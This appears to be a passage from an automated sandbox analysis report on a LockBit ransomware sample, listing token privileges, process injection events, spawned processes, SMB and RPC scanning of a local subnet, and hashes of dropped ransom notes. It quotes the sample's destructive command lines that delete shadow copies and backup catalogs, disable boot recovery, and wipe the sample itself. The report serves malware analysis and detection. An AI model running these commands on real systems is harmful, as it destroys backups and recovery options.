Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1848 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 4276 wrote to memory of 3292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4276 wrote to memory of 3292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4276 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4276 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4276 wrote to memory of 3916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 3916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 1824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 1824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 4312 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4276 wrote to memory of 4312 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2776 -ip 2776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 1676

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.253:135 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp

Files

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Restore-My-Files.txt

MD5 799161fca9a3167f25cc591922e9d4bf
SHA1 578a60791842ac09f171a72b6cc2997b8307b4a1
SHA256 6ebba29a420264342daf19a0d5d1dd36ecd56f5082b1d74d95733bc210ec75df
SHA512 0b23abb807fc49f995a0d3a8bce125770ad6b2cb9395e2d5317bdce394fddd165e1779c7434c91e479996f6caad88e6179bb13ac406aacc236b882cbc0381bb6

C:\Users\Admin\Desktop\LockBit-note.hta

MD5 1ab66d44b4dfadff2a914174e24c8cf2
SHA1 99214f760f492208095d8091d4b874df871858e5
SHA256 fc17dec8009c6af6add2a03807cc1ad8b08c2f34a0bff4922ecce9cba85de62e
SHA512 fbb46563c2b84e1e36980a818ddae1341f899e6d6159216c45b9be37da558b633b4f1243d0f9665434f31dd5b7a2e5d062a50506b7a5be57897ede5c85077e88